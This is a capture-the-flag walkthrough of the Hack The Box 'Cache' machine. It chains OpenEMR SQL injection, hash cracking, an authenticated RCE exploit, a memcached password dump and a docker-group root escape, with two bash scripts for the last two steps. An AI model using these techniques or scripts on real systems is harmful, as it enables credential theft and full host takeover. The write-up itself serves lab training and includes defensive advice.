HTB Cache Write-Up
User Flag
Result of nmap scan:
PORT STATE SERVICE VERSION
Heading to the IP address in the browser reveals a website that looks static and old. The login page, however, references an unusually named script, /jquery/functionality.js. Opening it shows that the login check is done client-side, and the only credentials hard-coded in the script are ash:H@v3_fun. The page behind the login is under construction, with a nice picture of Ace from One Piece.
Further exploration of the Author page shows:
ASH is a Security Researcher (Threat Research Labs), Security Engineer. Hacker, Penetration Tester and Security blogger. He is Editor-in-Chief, Author & Creator of Cache. Check out his other projects like Cache:
HMS (Hospital Management System)
So if we are exploring cache.htb, and the author page says there is an HMS project that is "like Cache", could it be reachable as hms.htb?
Add that name to the /etc/hosts file and we get a login page. The application turns out to be OpenEMR, an open-source electronic medical records system. When facing a known open-source application like this, I don't go straight for gobuster: its directory structure can be read directly from where the source is published, GitHub in this case, and the known vulnerabilities are already listed against its versions.
OpenEMR is on GitHub, but robots.txt does not mention the version. There is an admin.php in the root folder, and http://hms.htb/admin.php reveals that the deployed version is 5.0.1 (3). Back on GitHub, switch to the tag matching that version in order to read the exact source code that is deployed at HMS.
Now for vulnerability hunting: searchsploit lists an RCE for our version, but it requires authentication. A Google search ends with a PDF describing a ton of vulnerabilities in this release. Following its instructions, a SQL injection can be performed through the catid GET parameter of /portal/find_appt_popup_user.php. To speed up the exfiltration of the users, the repository contains the database schema; the target table is users_secure, which holds the login names and password hashes.
Successful SQLMap exploitation gives the credentials openemr_admin:$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
The $2a$05$ prefix marks a bcrypt hash with cost factor 5, so pass it to john (--format=bcrypt) or hashcat (-m 3200) and it cracks to xxxxxx (what a dumb password for an admin, lol).
Now that we are authenticated, it is time to use the exploit found with searchsploit (45161.py, the authenticated RCE for OpenEMR 5.0.1.3):
$ searchsploit -m php/webapps/45161.py
Run it against hms.htb with the openemr_admin credentials and you have a shell!
The user flag is owned by, and readable only by, ash, but we do have a password for ash from the Cache JS script. First upgrade the shell to a proper TTY, then su to ash with that password:
$ python3 -c 'import pty; pty.spawn("/bin/bash")' # Spawn TTY shell
Voilà!
Root Flag
Ash can't sudo on the box, so we use the famous linpeas script to look for things we can exploit.
In the process list, I spotted:
memcache 1098 0.0 0.1 425792 4052 ? Ssl 13:30 0:00 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -P /var/run/memcached/memc
Memcached is listening on port 11211, bound to localhost only (-l 127.0.0.1), which is why it did not show up in the nmap scan. Let's see what information it holds:
ash@cache:~$ telnet localhost 11211
Dumping the cached items gives 0n3_p1ec3! That is surely the password of user luffy (I'm a BIG fan of One Piece, by the way).
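What the telnet session above does by hand, written out as an added example (my own script, not the write-up's or the box's): walk the memcached text protocol from stats items (which slabs hold data) through stats cachedump (which keys each slab holds) to get (the values). It assumes memcached on 127.0.0.1:11211 as in the process listing; the sample replies and the user/passwd key names used for the offline check are constructed, not captured from the box.

```shell
#!/bin/bash
# Added example, not part of the original write-up: enumerating a local
# memcached through its plain-text protocol. Assumes the default text
# protocol on 127.0.0.1:11211 (as in the process listing); the sample
# replies and key names below are constructed, not captured.

MEMC_HOST=${MEMC_HOST:-127.0.0.1}
MEMC_PORT=${MEMC_PORT:-11211}

# Send one command over bash's built-in /dev/tcp (no telnet or nc needed on
# the target) and print the reply up to the terminating END line.
memc_cmd() {
    exec 3<>"/dev/tcp/$MEMC_HOST/$MEMC_PORT" || return 1
    printf '%s\r\n' "$1" >&3
    local line
    while IFS= read -r -t 2 line <&3; do
        line=$(printf '%s' "$line" | tr -d '\r')
        printf '%s\n' "$line"
        [ "$line" = END ] && break
    done
    exec 3>&-
}

# "stats items" reports per-slab counters such as "STAT items:1:number 2";
# keep only the slab ids that hold at least one item.
memc_slab_ids() {
    printf '%s\n' "$1" | tr -d '\r' |
        awk -F'[: ]' '$1=="STAT" && $2=="items" && $4=="number" && $5+0>0 {print $3}' |
        sort -un
}

# "stats cachedump <slab> 0" lists every key in a slab as "ITEM <key> [<n> b; <t> s]".
memc_keys() {
    printf '%s\n' "$1" | tr -d '\r' | awk '$1=="ITEM" {print $2}'
}

# "get <key>" answers "VALUE <key> <flags> <bytes>", then the data, then END;
# return the data line.
memc_value() {
    printf '%s\n' "$1" | tr -d '\r' | awk 'found {print; exit} $1=="VALUE" {found=1}'
}

# Live walk: every slab, every key, every value, printed as key=value.
memc_dump_all() {
    local slab key
    for slab in $(memc_slab_ids "$(memc_cmd 'stats items')"); do
        for key in $(memc_keys "$(memc_cmd "stats cachedump $slab 0")"); do
            printf '%s=%s\n' "$key" "$(memc_value "$(memc_cmd "get $key")")"
        done
    done
}

# Constructed server replies so the parsers can be exercised without a server.
SAMPLE_ITEMS=$(printf 'STAT items:1:number 2\r\nSTAT items:1:age 10\r\nSTAT items:5:number 0\r\nEND\r\n')
SAMPLE_DUMP=$(printf 'ITEM user [5 b; 0 s]\r\nITEM passwd [9 b; 0 s]\r\nEND\r\n')
SAMPLE_GET=$(printf 'VALUE passwd 0 9\r\n0n3_p1ec3\r\nEND\r\n')

# Only talk to a real server when asked: MEMC_LIVE=1 ./memc_enum.sh
if [ -n "${MEMC_LIVE:-}" ]; then
    memc_dump_all
fi
```

Inside the telnet session the same three commands are typed by hand: stats items, stats cachedump <slab> 0, then get <key> for each key listed. Note that stats cachedump is an unofficial command and may be missing on newer memcached builds, where lru_crawler metadump all lists the keys instead; the get step is the same either way. The defender's takeaway is the same as for any cache: secrets such as a user's password do not belong in memcached, and a service bound to 127.0.0.1 is still readable by every local account.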
Lateral movement is now done, but luffy can't sudo either, so let's run linpeas again. Its first lines of output reveal that luffy is a member of the docker group:
User & Groups: uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
This means we can run docker commands, including starting containers, without sudo, and the privilege escalation becomes clear: membership of the docker group is root-equivalent. We start an interactive container with the host filesystem mounted as a volume; since we are root inside the container, we are root over the mounted volume, which is the box's own filesystem. Let's first check whether there is an image on the box we can use, because if not, we will have to run a docker registry on our machine, host a useful image in it, and make the box pull it.
luffy@cache:~$ docker image ls
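The container escape described above, as an added example (my own script, not from the write-up): it picks a local image, mounts / into the container and chroots into it, and it includes the defender-side check of who sits in the docker group. It assumes a docker CLI that works without sudo and at least one image already present; the /etc/group excerpt it tests against is constructed.

```shell
#!/bin/bash
# Added example, not part of the original write-up: abusing docker-group
# membership to become root on the host, plus the check a defender runs to
# find who has that power. Assumes the docker CLI is usable without sudo and
# that some image already exists locally; the image name is taken from
# `docker image ls`, and the /etc/group excerpt below is constructed.

# Command that binds the host's / into the container at /mnt and chroots into
# it: the resulting shell is root on the real host filesystem (edit
# /etc/shadow, drop a key in /root/.ssh, read /root/root.txt).
docker_root_cmd() {
    printf 'docker run --rm -it -v /:/mnt %s chroot /mnt /bin/bash\n' "$1"
}

# First usable local image in repository:tag form; empty output if there is
# none, in which case an image must be pulled or served from the attacker's
# own registry.
first_local_image() {
    docker image ls --format '{{.Repository}}:{{.Tag}}' 2>/dev/null |
        grep -v '<none>' | head -n 1
}

# Defender's check: every member of the docker group is root-equivalent.
# Takes a group file path so it can be run against a copy (default /etc/group).
docker_group_members() {
    awk -F: '$1=="docker" { n=split($4, m, ","); for (i=1; i<=n; i++) if (m[i]!="") print m[i] }' "${1:-/etc/group}"
}

# Constructed /etc/group excerpt for the offline check.
SAMPLE_GROUP=$(mktemp)
trap 'rm -f "$SAMPLE_GROUP"' EXIT
printf 'root:x:0:\nsudo:x:27:\ndocker:x:999:luffy\nluffy:x:1001:\n' > "$SAMPLE_GROUP"

# Only touch docker when explicitly asked: DOCKER_LIVE=1 ./docker_root.sh
if [ -n "${DOCKER_LIVE:-}" ]; then
    image=$(first_local_image)
    if [ -z "$image" ]; then
        echo 'no local image: pull one or serve one from your own registry' >&2
        exit 1
    fi
    sh -c "$(docker_root_cmd "$image")"
fi
```

The mount is the whole trick: the docker daemon runs as root and will happily bind any host path into a container, so -v /:/mnt followed by chroot /mnt gives a root shell on the host with no exploit involved. On the defensive side, docker_group_members against the real /etc/group is the audit to run; anyone listed there should be treated exactly like a sudoer with NOPASSWD.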
Congratulations, you just rooted the box.